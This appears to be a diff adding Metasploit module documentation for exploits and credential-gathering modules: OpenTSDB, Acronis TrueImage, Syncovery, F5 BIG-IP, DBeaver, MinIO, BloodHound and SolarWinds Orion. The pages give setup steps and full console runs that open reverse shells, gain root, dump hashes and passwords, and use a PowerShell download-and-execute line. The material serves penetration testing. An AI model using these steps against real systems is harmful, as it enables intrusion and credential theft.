+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. The target is OpenTSDB version 2.3.0
+[*] Identified 25 configured metrics. Using metric MessagePrePublishingEvents.mean_rate
+[*] Identified 31 configured aggregators. Using aggregator max
+[*] Executing the payload
+[*] Accepted the first client connection...
+[*] Accepted the second client connection...
+[*] Command: echo q08IVzJKPKz8soea;
+[*] Writing to socket A
+[*] Writing to socket B
+[*] Reading from sockets...
+[*] Reading from socket B
+[*] B: "q08IVzJKPKz8soea\r\n"
+[*] Matching...
+[*] A is input...
+[*] Command shell session 3 opened (10.10.1.30:1337 -> 10.10.1.1:52370) at 2022-11-24 19:24:06 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+```
@@ -0,0 +1,111 @@
+## Vulnerable Application
+
+Acronis TrueImage versions 2019 update 1 through 2021 update 1
+are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`
+helper tool does not perform any validation on connecting clients,
+which gives arbitrary clients the ability to execute functions provided
+by the helper tool with `root` privileges.
+
+This module connects to the helper tool and executes the payload via
+the helper tool's `executeProcess:arguments:caller:withReply:;` function,
+granting a session as `root`.
+
+### Installation Instructions
+
+Run through the installer with all of the defaults. Once the application
+is installed, open the application and allow the privileges requested.
+That should be enough for the helper tool to be placed in the
+`/Library/PrivilegedHelperTools` directory. You should not have to set up
+a trial to get the exploit to work.
+
+*Note* The 2021 version of Acronis TrueImage comes with an uninstaller
+that will remove the helper tool if used. However, if the software is
+uninstalled via the drag-and-drop method, the helper tool will be left behind.
+The 2020 version does not appear to come with an uninstaller, so the helper tool
+will need to be manually deleted from `/Library/PrivilegedHelperTools` when
+uninstalling the software.
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Get a meterpreter or shell session on the target
+4. Do: `use exploit/osx/local/acronis_trueimage_xpc_privesc`
+5. Do: `set SESSION <session_no>`
+6. Do: `run`
+7. You should get a new session as root.
+
+## Options
+
+### WRITABLE_DIR
+
+Directory to use to write exploit files to
+
+### SHELL
+
+Default shell to use for exploit
+
+### COMPILE
+
+Determines if exploit will be compiled on the target or if a pre-compiled exploit
+will be used.
+
+## Scenarios
+
+### Acronis TrueImage Build 22510 on macOS 12.5
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (810648 bytes) to 192.168.140.204
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.204:53610) at 2022-11-15 08:44:36 -0600
+
+meterpreter > getuid
+Server username: space
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           :  (macOS 12.5.0)
+Architecture : x64
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use exploit/osx/local/acronis_trueimage_xpc_privesc
+[*] Using configured payload osx/x64/meterpreter/reverse_tcp
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set session 1
+session => 1
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set lport 5555
+lport => 5555
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > set verbose true
+verbose => true
+msf6 exploit(osx/local/acronis_trueimage_xpc_privesc) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:5555
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Vulnerable build 22510 found
+[*] Attempting to write payload at /tmp/FHQUXzNR
+[*] Writing '/tmp/FHQUXzNR' (17204 bytes) ...
+[+] Successfully wrote payload at /tmp/FHQUXzNR
+[*] Successfully compiled iZMwhN.m...Now executing payload
+[*] Transmitting first stager...(214 bytes)
+[*] Transmitting second stager...(49152 bytes)
+[*] Sending stage (810648 bytes) to 192.168.140.204
+[+] Deleted /tmp/FHQUXzNR
+[+] Deleted /tmp/iZMwhN.m
+[+] Deleted /tmp/iZMwhN
+[*] Meterpreter session 2 opened (192.168.140.1:5555 -> 192.168.140.204:53763) at 2022-11-15 08:45:13 -0600
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : spaces-Mac.local
+OS           :  (macOS 12.5.0)
+Architecture : x64
+BuildTuple   : x86_64-apple-darwin
+Meterpreter  : x64/osx
+```
@@ -0,0 +1,110 @@
+## Vulnerable Application
+[Syncovery For Linux with Web-GUI](https://www.syncovery.com/download/linux/)
+
+This module exploits an authenticated remote code execution vulnerability (CVE-2022-36534)
+in the Web GUI of Syncovery File Sync & Backup Software for Linux.
+Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.
+Jobs can contain arbitrary system commands and will be executed as the user `root`.
+A valid username and password or a session token is needed to exploit the vulnerability.
+
+This affects Syncovery for Linux before v9.48j and all versions of the obsolete branch 8.
+
+Installing a vulnerable version of Syncovery for Linux to test this vulnerability is quite easy.
+Download a vulnerable version of Syncovery for Linux: https://www.syncovery.com/release/Syncovery-9.47a-amd64.deb
+Install it and once the server is up, you can access it on port 8999 for testing...
+
+## Authors
+
+- Jan Rude (mgm security partners GmbH)
+
+## Platforms
+
+- Unix
+
+## Verification Steps
+
+1. `use exploit/unix/http/syncovery_linux_rce_2022_36534`
+2. `set RHOSTS <TARGET HOSTS>`
+3. `set LHOST <Address of Attacking Machine>`
+4. `run`
+5. You should get a meterpreter shell as the `root` user.
+
+## Options
+
+### USERNAME
+Username used for login. Default is "default".
+
+### PASSWORD
+Password used for login. Default is "pass".
+
+### TOKEN
+Instead of using a username and password it is also possible to use an authentication token.
+A valid token might be successfully brute-forced with the scanner module `syncovery_linux_token_cve_2022_36536`.
+
+### TARGETURI
+The path to Syncovery login.
+
+### PORT
+The (TCP) target port on which Syncovery is running. By default port 8999 is used for HTTP and port 8943 is used for HTTPS.
+
+## Scenarios
+
+### Syncovery for Linux with default credentials
+
+```
+msf6 > use exploits/unix/http/syncovery_linux_rce_2022_36534
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > set rhosts 192.168.178.26
+rhosts => 192.168.178.26
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > set lhost 192.168.178.26
+lhost => 192.168.178.26
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > options
+
+Module options (exploit/unix/http/syncovery_linux_rce_2022_36534):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   PASSWORD   pass             yes       The password to Syncovery (default: pass)
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.178.26   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8999             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The path to Syncovery
+   TOKEN                       no        A valid session token
+   USERNAME   default          yes       The username to Syncovery (default: default)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.178.26   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Syncovery for Linux < 9.48j
+
+
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > check
+[+] 192.168.178.26:8999 - The target is vulnerable.
+msf6 exploit(unix/http/syncovery_linux_rce_2022_36534) > run
+
+[*] Started reverse TCP handler on 192.168.178.26:4444 
+[+] 192.168.178.26:8999 - Exploit successfully executed
+[*] Sending stage (40132 bytes) to 192.168.178.26
+[*] Meterpreter session 1 opened (192.168.178.26:4444 -> 192.168.178.26:38008) at 2022-09-06 13:44:13 +0200
+
+meterpreter > sysinfo
+Computer        : kali
+OS              : Linux 5.16.0-kali7-amd64 #1 SMP PREEMPT Debian 5.16.18-1kali1 (2022-04-01)
+Architecture    : x64
+System Language : en_US
+Meterpreter     : python/linux
+meterpreter > getuid
+Server username: root
+```
@@ -13,6 +13,9 @@ with BusyBox telnetd installed.
  The command telnetd will execute on connect. The default value is `/bin/sh`
  in order to provide a command shell.

+  **TelnetdPath**
+  The path to the telnetd executable on disk. The default value is `telnetd`.
+
 ### Advanced

  **CommandShellCleanupCommand**
@@ -0,0 +1,52 @@
+## Vulnerable Application
+
+This module will check which shell commands are available on a system.
+
+
+## Verification Steps
+
+1. Start msfconsole
+1. Get a session
+1. Do: `use post/linux/gather/enum_commands`
+1. Do: `set session <session ID>`
+1. Do: `run`
+1. You should receive a list of shell commands
+
+
+## Options
+
+### DIR
+
+Optional directory name to list (in addition to default system PATH and common paths)
+
+
+## Scenarios
+
+### Ubuntu 22.04.1 (x86_64)
+
+```
+msf6 > use post/linux/gather/enum_commands 
+msf6 post(linux/gather/enum_commands) > set session 1
+session => 1
+msf6 post(linux/gather/enum_commands) > run
+
+[+] Found 3795 executable binaries/commands
+/bin/GET
+/bin/HEAD
+/bin/POST
+/bin/VGAuthService
+/bin/X
+/bin/X11
+/bin/Xephyr
+/bin/Xorg
+/bin/Xwayland
+/bin/[
+/bin/aa-enabled
+/bin/aa-exec
+/bin/aa-features-abi
+
+...
+
+[*] Post module execution completed
+msf6 post(linux/gather/enum_commands) > 
+```
@@ -0,0 +1,137 @@
+## Vulnerable Application
+
+The application is F5 Big-IP, and I don't think the versions matters but I
+tested on version 17.0.0.1. It can be downloaded as a VMWare image for free
+(you have to create an account) from https://downloads.f5.com. You can register
+for a free 30-day trial if you like, but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: Get any session somehow (`exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800` works well on 17.0.0.1 and earlier, or just use `msfvenom` w/ a Linux payload)
+4. Do: `use post/linux/gather/f5_loot_mcp`
+5. Do `set SESSION <sessionid>`
+6. Do: `run`
+7. You should get the info
+
+## Options
+
+### GATHER_HASHES
+
+If `true`, read a list of local users and passwords (`userdb_entry` values) from mcp.
+
+Default: true
+
+### GATHER_SERVICE_PASSWORDS
+
+If `true`, read upstream service passwords (active directory, LDAP, etc) from different parts of mcp.
+
+Default: true
+
+### GATHER_DB_VARIABLES
+
+If `true`, read configuration information from mcp (note that this is slow).
+
+Default: false (due to the speed)
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 with a root session
+
+First, get a non-root session however you can. I used the rpmspec vuln:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword mybigtestpassword
+HttpPassword => iagotestbigip
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/708677fa-5b30-43e6-9ce3-d84046e9f6e9.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/yE15kZeAwp-1.6.1-7.4.4.noarch.rpm
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:36124) at 2022-11-14 16:12:04 -0800
+
+meterpreter > bg
+```
+
+Then just use the module, set the SESSION, and run it:
+
+```
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > use post/linux/gather/f5_loot_mcp
+msf6 post(linux/gather/f5_loot_mcp) > set SESSION 1
+SESSION => 1
+msf6 post(linux/gather/f5_loot_mcp) > set VERBOSE true
+VERBOSE => true
+msf6 post(linux/gather/f5_loot_mcp) > show options
+
+Module options (post/linux/gather/f5_loot_mcp):
+
+   Name                       Current Setting  Required  Description
+   ----                       ---------------  --------  -----------
+   GATHER_DB_VARIABLES        false            yes       Gather database variables (warning: slow)
+   GATHER_HASHES              true             yes       Gather password hashes from mcp
+   GATHER_UPSTREAM_PASSWORDS  true             yes       Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from mcp
+   SESSION                    1                yes       The session to run this module on
+
+
+View the full module info with the info, or info -d command.
+
+msf6 post(linux/gather/f5_loot_mcp) > run
+
+[*] Gathering users and password hashes from MCP
+[+] admin:$6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi2j0mh.ww9i1
+[+] f5hubblelcdadmin:yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG
+[+] root:$6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr0gocIIyMoc1
+[*] Gathering upstream passwords from MCP
+[*] Trying to fetch LDAP / Active Directory configuration
+[+] dc.msflab.local:636   - ldaps: 'smcintyre:Password1!'
+[*] Trying to fetch Radius configuration
+[+] 192.168.159.12:1812   - radius: ':radiussecret'
+[+] 192.168.159.13:1812   - radius: ':radiusbackup'
+[*] Trying to fetch TACACS+ configuration
+[+] 192.168.159.200:49    - tacacs+: ':tacaspassword'
+[*] Trying to fetch SMTP configuration
+[+] 192.168.159.128:25    - smtp: 'alice:secretpassword'
+[*] Post module execution completed
+```
+
+The module logs information to the Metasploit database (when connected):
+
+```
+msf6 post(linux/gather/f5_loot_mcp) > creds
+Credentials
+===========
+
+host             origin           service            public            private                                                                                              realm  private_type        JtR Format
+----             ------           -------            ------            -------                                                                                              -----  ------------        ----------
+                 192.168.159.119                     smcintyre         Password1!                                                                                                  Password            
+                 192.168.159.119                     admin             $6$Rvvp3001$4fGV5Pb2gf9rbiV78KCbdbGhfdwsFL0Kt1BR3IIytgb.2aXCpJG0xC2.JDzRvpAjTbIrvBt7YHi (TRUNCATED)         Nonreplayable hash  sha512,crypt
+                 192.168.159.119                     f5hubblelcdadmin  yJXc4uXccfpSrdxcvZIjYT7clhNMUPJG                                                                            Nonreplayable hash  
+                 192.168.159.119                     root              $6$leOcJhIk$pY9xDy1lvacvJzIYM0RCgJ3laTppP2jFjsNek1AbFddYQWEuFMek51K5cyg5BU3pYMhTGQoWgDr (TRUNCATED)         Nonreplayable hash  sha512,crypt
+192.168.159.12   192.168.159.119  1812/tcp (radius)                    radiussecret                                                                                                Password            
+192.168.159.13   192.168.159.119  1812/tcp (radius)                    radiusbackup                                                                                                Password            
+192.168.159.128  192.168.159.119  25/tcp (smtp)      alice             secretpassword                                                                                              Password            
+192.168.159.200  192.168.159.119  49/tcp (tacacs+)                     tacaspassword                                                                                               Password            
+
+msf6 post(linux/gather/f5_loot_mcp) > services
+Services
+========
+
+host             port  proto  name     state  info
+----             ----  -----  ----     -----  ----
+192.168.159.12   1812  tcp    radius   open
+192.168.159.13   1812  tcp    radius   open
+192.168.159.128  25    tcp    smtp     open
+192.168.159.200  49    tcp    tacacs+  open
+
+msf6 post(linux/gather/f5_loot_mcp) >
+```
@@ -0,0 +1,66 @@
+## Vulnerable Application
+  DBeaver is free and open source universal database tool for developers and database administrators.
+
+  This module will determine if Dbeaver is installed on the target system and, if it is, it will try to
+  dump all saved session information from the target. The passwords for these saved sessions will then be decrypted
+  where possible.
+
+  Any Dbeaver version on any operating system are supported.
+
+  If it works normally, the connection name, host, username and password saved in the certificate file will be printed
+
+### Installation Steps
+
+  1. Download and run the Dbeaver installer (https://dbeaver.io/files/). Since
+     the encryption algorithm changed in version 6.1.3, it is recommended to
+     test this module against a version below 6.1.3 and also against the latest
+     version.
+  2. Select default installation
+  3. Open the software and create a database connection
+     complete password setting, add the test account password to the certificate.
+
+## Verification Steps
+
+  1. Get a session.
+  2. Do: `set session <session number>`
+  3. Do: `run post/multi/gather/credentials/dbeaver`
+  4. If the system has registry keys for Dbeaver passwords they will be printed out.
+
+## Options
+
+ **XML_FILE_PATH**
+
+Specify an XML configuration file (eg.
+`C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml` or
+`C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver-data-sources.xml`).
+
+ **JSON_DIR_PATH**
+
+Specifies the config dir path for Dbeaver. Ensure that there are two files
+`credentials-config.json` and `data-sources.json` under the directory (eg.
+`"C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver`).
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/dbeaver
+
+[*] Gather Dbeaver Passwords on FireEye
+[+] dbeaver .dbeaver-data-sources.xml saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_319751.txt
+[*] Finished processing C:\Users\FireEye\.dbeaver4\General\.dbeaver-data-sources.xml
+[+] dbeaver credentials-config.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_334807.txt
+[+] dbeaver data-sources.json saved to /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_dbeaver.creds_309767.txt
+[*] Finished processing C:\Users\FireEye\AppData\Roaming\DBeaverData\workspace6\General\.dbeaver
+[+] Passwords stored in: /home/kali-team/.msf4/loot/20221205145256_default_172.16.153.128_host.dbeaver_421133.txt
+[+] Dbeaver Password
+================
+
+Name             Protocol    Hostname   Port  Username  Password        DB        URI                                        Type
+----             --------    --------   ----  --------  --------        --        ---                                        ----
+Test_MYSQL       mysql       localhost  3306  root      test_password   db        jdbc:mysql://localhost:3306/db             dev
+Test_PostgreSQL  postgresql  localhost  5432  postgres  test_passwordr  postgres  jdbc:postgresql://localhost:5432/postgres  dev
+localhost        mysql       localhost  3306  root      test_mysql      db        jdbc:mysql://localhost:3306/db             test
+postgres         postgresql  localhost  5432  postgres  test_postgres   postgres  jdbc:postgresql://localhost:5432/postgres  prod
+
+meterpreter >
+```
@@ -0,0 +1,42 @@
+## Vulnerable Application
+[MinIO Client](https://dl.min.io/client/mc/release/)
+The MinIO Client mc command line tool provides a modern alternative to UNIX commands like ls,
+cat, cp, mirror, and diff with support for both filesystems and Amazon S3-compatible cloud storage services.
+Its credential file is saved in the user's home directory in plaintext json.
+## Installation Steps
+
+  1. Download the latest installer of MinIO Client (https://dl.min.io/client/mc/release/).
+  2. Run `mc alias set myminio https://play.min.io minioadmin minioadmin`.
+  3. Run `mc admin info myminio`,check for working.
+
+## Verification Steps
+
+  1. Get a `meterpreter` session on a Windows host.
+  2. Do: `run post/multi/gather/minio_client`
+  3. If the configuration file is found in the system, it will be printed out
+
+## Options
+
+### CONFIG_PATH
+
+Specifies the config file path for MinIO Client (eg. `C:\Users\FireEye\mc\config.json`)
+
+## Scenarios
+
+```
+meterpreter > run post/windows/gather/credentials/minio_client CONFIG_PATH="C:\Users\FireEye\mc\config.json"
+
+[*] Parsing file C:\Users\FireEye\mc\config.json
+MinIO Client Key
+================
+
+name     url                             accessKey             secretKey                                 api   path
+----     ---                             ---------             ---------                                 ---   ----
+gcs      https://storage.googleapis.com  YOUR-ACCESS-KEY-HERE  YOUR-SECRET-KEY-HERE                      S3v2  dns
+local    http://localhost:9000                                                                           S3v4  auto
+myminio  https://play.min.io             minioadmin            minioadmin                                s3v4  auto
+play     https://play.min.io             Q3AM3UQ867SPQQA43P2F  zuf+tfteSlswRu7BJ86wekitnifILbZam1KYY3TG  S3v4  auto
+s3       https://s3.amazonaws.com        YOUR-ACCESS-KEY-HERE  YOUR-SECRET-KEY-HERE                      S3v4  dns
+
+[+] Session info stored in: /home/kali-team/.msf4/loot/20221206193240_default_172.16.153.128_host.minio_756923.txt
+```
@@ -29,7 +29,7 @@ Which method to use to get shaphound running.  Default is `download`.

 ### CollectionMethode

-The collection method to use. This parameter accepts a comma separated list of values. Accepted values are `Default`, `Group`,
+The collection method to use. Accepted values are `Default`, `Group`,
 `LocalAdmin`, `RDP`, `DCOM`, `GPOLocalGroup`, `Session`, `ObjectProps`, `ComputerOnly`, `LoggedOn`, `Trusts`, `ACL`, `Container`,
 `DcOnly`, `All`.  The default method is `Default`.

@@ -61,10 +61,6 @@ Uses LDAPs instead of unencrypted LDAP on port 636. The default value is `false`

 Disables Kerberos Signing on requests. The default value is `false`.

-### SkipPing
-
-Skip all ping checks for computers. This option will most likely be slower as API calls will be made to all computers regardless of
-being up Use this option if ping is disabled on the network for some reason. The default value is `false`.

 ### OutputFolder

@@ -80,22 +76,41 @@ If the cache file (.bin) should NOT be written to disk.  Default is `true`.

 ## Scenarios

-```
-meterpreter > run post/windows/gather/bloodhound
+### Windows 2012 Domain Controller, Download method

-[*] Using URL: http://0.0.0.0:8080/bvqUdtHUQ4De1O3
-[*] Local IP: http://192.168.1.136:8080/bvqUdtHUQ4De1O3
-[*] Invoking BloodHound with: Invoke-BloodHound -CollectionMethod Default -Threads 10 -JSONFolder "C:\Windows\TEMP" -PingTimeout 250 -LoopDelay 300 
-[*] Initializing BloodHound at 6:44 AM on 4/29/2019
-[*] Resolved Collection Methods to Group, LocalAdmin, Session, Trusts
-[*] Starting Enumeration for uplift.local
-[*] Status: 58 objects enumerated (+58 �/s --- Using 58 MB RAM )
-[*] Finished enumeration for uplift.local in 00:00:00.6365050
-[*] 0 hosts failed ping. 0 hosts timedout.
-[*] 
-[*] Compressing data to C:\Windows\TEMP\20190429064444_BloodHound.zip.
-[*] You can upload this file directly to the UI.
-[*] Finished compressing files!
+```
+msf6 post(windows/gather/bloodhound) > run
+
+[*] Using URL: http://1.1.1.1:8080/127mPhBr3dZ
+[*] Loading BloodHound with: IEX (new-object net.webclient).downloadstring('http://1.1.1.1:8080/127mPhBr3dZ')
+[*] Invoking BloodHound with: Invoke-BloodHound -OutputDirectory "C:\Users\ADMINI~1\AppData\Local\Temp" -ZipFileName isid -MemCache -ZipPassword ilvtbfgkcmwszdxjn 
+[*] 2022-11-13T13:45:21.0298446-05:00|INFORMATION|This version of SharpHound is compatible with the 4.2 Release of BloodHound
+[*] 2022-11-13T13:45:21.4198615-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
+[*] 2022-11-13T13:45:21.4666492-05:00|INFORMATION|Initializing SharpHound at 1:45 PM on 11/13/2022
+[*] 2022-11-13T13:45:22.2154647-05:00|INFORMATION|Loaded cache with stats: 59 ID to type mappings.
+[*]  59 name to SID mappings.
+[*]  0 machine sid mappings.
+[*]  2 sid to domain mappings.
+[*]  0 global catalog mappings.
+[*] 2022-11-13T13:45:22.2310827-05:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
+[*] 2022-11-13T13:45:22.6054639-05:00|INFORMATION|Beginning LDAP search for hoodiecola.com
+[*] 2022-11-13T13:45:22.7458626-05:00|INFORMATION|Producer has finished, closing LDAP channel
+[*] 2022-11-13T13:45:22.7614632-05:00|INFORMATION|LDAP channel closed, waiting for consumers
+[*] 2022-11-13T13:45:53.5431310-05:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 87 MB RAM
+[*] 2022-11-13T13:46:06.1354911-05:00|INFORMATION|Consumers finished, closing output channel
+[*] 2022-11-13T13:46:06.2134955-05:00|INFORMATION|Output channel closed, waiting for output task to complete
+[*] Closing writers
+[*] 2022-11-13T13:46:06.5255088-05:00|INFORMATION|Status: 100 objects finished (+100 2.325581)/s -- Using 89 MB RAM
+[*] 2022-11-13T13:46:06.5255088-05:00|INFORMATION|Enumeration finished in 00:00:43.9260652
+[*] 2022-11-13T13:46:06.7283096-05:00|INFORMATION|Saving cache with stats: 59 ID to type mappings.
+[*]  59 name to SID mappings.
+[*]  0 machine sid mappings.
+[*]  2 sid to domain mappings.
+[*]  0 global catalog mappings.
+[*] 2022-11-13T13:46:06.7439000-05:00|INFORMATION|SharpHound Enumeration Completed at 1:46 PM on 11/13/2022! Happy Graphing!
+[+] Downloaded C:\Users\ADMINI~1\AppData\Local\Temp\20221113134605_isid.zip: /root/.msf4/loot/20221113141655_default_2.2.2.2_windows.ad.blood_027677.zip
+[+] Zip password: ilvtbfgkcmwszdxjn
+[*] Post module execution completed
 ```

 ### Windows 10 non-AD host, Windows Server 2012 AD, Disk Method
@@ -0,0 +1,291 @@
+## Vulnerable Application
+
+This module exports and decrypts credentials from SolarWinds Orion Network Performance Monitor
+to a CSV file; it is intended as a post-exploitation module for Windows hosts with SolarWinds
+Orion NPM installed. The module supports decryption of AES-256, RSA, and XMLSEC secrets. Separate
+actions for extraction and decryption of the data are provided to allow session migration during
+execution in order to log in to the SQL database using SSPI. Tested on  the 2020 version of
+SolarWinds Orion NPM. This module is possible only because of the source code and technical
+information published by Rob Fuller:
+
+https://malicious.link/post/2020/solarflare-release-password-dumper-for-SolarWinds-orion
+
+and Atredis Partners:
+
+https://github.com/atredispartners/solarwinds-orion-cryptography
+
+Meterpreter must be running in the context of SYSTEM in order to extract encryption keys.
+
+## Actions
+
+### Dump
+
+`dump` is the default action and performs extraction of the Orion database parameters and encryption keys.
+This action also exports Orion SQL data and immediately decrypts it. `dump` is suitable when the following
+conditions are met:
+
+1. The sqlcmd binary is available on the target system
+2. The machine account has access to the Orion database (if Windows Integrated) or Orion is using SQL native auth
+
+Invoking the `dump` action requires SYSTEM level permissions on the target host in order to extract AES keys.
+
+### Export
+
+`export` performs SQL data extraction of the encrypted data as a CSV file; use this option if it is necessary to
+migrate the Meterpreter session to a new non-SYSTEM identity in order to access the SQL database. Invoking the
+`export` action requires the Meterpreter session to be running in the context of a user that has access to the
+configured Orion SQL database.
+
+### Decrypt
+
+`decrypt` performs decryption of encrypted Orion SQL data. To invoke the `decrypt` action, you must also set the
+`CSV_FILE` advanced option or the `MSSQL_INSTANCE` and `MSSQL_DB` options, as well as the `AES_KEY` and
+`RSA_KEY_FILE` advanced options. See `SQL Data Acquisition` below for more information.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Get session on host via method of choice and background it
+3. Do: `use post/windows/gather/credentials/solarwinds_orion_dump`
+4. Do: `set session <session>`
+5. Do: `dump` to extract and decrypt the Orion database, or `export` to extract the encrypted database only
+
+If `dump` or `export` fail, the session identity may need permission to log in to SQL; see `Scenarios`.
+
+## Advanced Options
+
+### AES_KEY
+
+The AES-256 key extracted from `default.dat` in hexadecimal format. Provide this option
+when invoking offline decryption using the `decrypt` action.
+
+### CERT_SHA1
+
+The SHA1 thumbprint of the SSL certificate in the Windows machine certificate store that
+is assigned to SolarWinds Orion for decryption of RSA and XMLSEC secrets. Set this option
+if Orion uses a custom certificate or has multiple certificates in the store with a Subject
+Common Name of `CN=solarwinds-orion`.
+
+### CSV_FILE
+
+Path to a CSV file that contains the encrypted Orion database data that has been
+previously exported. Provide this option when invoking offline decryption using the
+`decrypt` action.
+
+### MSSQL_DB
+
+The MSSQL database name used by Orion, specified in the `INITIAL CATALOG` as extracted
+from `SWNetPerfMon.DB`. Provide this option when invoking the `export` action.
+
+### MSSQL_INSTANCE
+
+The path to the MSSQL instance used by Orion, specified in the `DATA SOURCE` as extracted
+from `SWNetPerfMon.DB`. Provide this option when invoking the `export` action.
+
+### RSA_KEY_FILE
+
+Path to the extracted RSA private key associated with the certificate assigned to SolarWinds
+Orion for decryption of RSA and XMLSEC secrets. Provide this option when invoking offline
+decryption using the `decrypt` action, or you wish to provide alternative RSA private key
+material during `dump`.
+
+## Scenarios
+
+### SQL Data Acquisition
+
+The sqlcmd binaries (part of the SQL Server Management Studio) must be installed on the system
+to access the database. Orion does not install SSMS or sqlcmd by default if it is not also
+installing a local SQL server instance - in such cases, it will be necessary to extract the
+encrypted database manually and provide the module with a path to the extracted data. To do so
+execute the SQL query below against the Orion database and save the resulting row set as a CSV file.
+
+The CSV header must match:
+
+`CredentialID,Name,Description,CredentialType,CredentialOwner,CredentialPropertyName,Value,Encrypted`
+
+Columns are cast `VARBINARY` to deal with poor CSV export support in `sqlcmd`. Export the results of
+the query below to CSV file:
+
+```
+SELECT 
+  c.ID AS CredentialID,
+  CONVERT(VARBINARY(1024),c.Name) Name,
+  CONVERT(VARBINARY(1024),c.Description) Description,
+  CONVERT(VARBINARY(256),c.CredentialType) CredentialType,
+  CONVERT(VARBINARY(256),c.CredentialOwner) CredentialOwner,
+  CONVERT(VARBINARY(1024),cp.Name) CredentialPropertyName,
+  CONVERT(VARBINARY(8000),cp.Value) Value,
+  cp.Encrypted 
+FROM
+  [dbo].[Credential] AS c
+JOIN 
+  [dbo].[CredentialProperty] AS cp ON (c.ID=cp.CredentialID)
+```
+
+Output must be encoded VARBINARY per above, and must be well-formed CSV (i.e. no trailing whitespace).
+If using `sqlcmd`, ensure the `-W` and `-I` parameters are included to strip trailing whitespace and
+allow quoted identifyers. Suggested syntax for `sqlcmd` using Windows authentication is below, where
+the contents of `solarwinds_sql_query.sql` is the text of the SQL query above:
+
+`sqlcmd -d "<DBNAME>" -S <MSSQL_INSTANCE> -E -i solarwinds_sql_query.sql -o solarwinds_dump.csv -h-1 -s"," -w 65535 -W -I`
+
+This should place a CSV export file suitable for use within the module at `solarwinds_dump.csv`. If
+using SQL native auth, replace the `-E` parameter with
+
+`-U "<MSSQL_USER>" -P "<MSSQL_PASS>"`
+
+### Examples
+
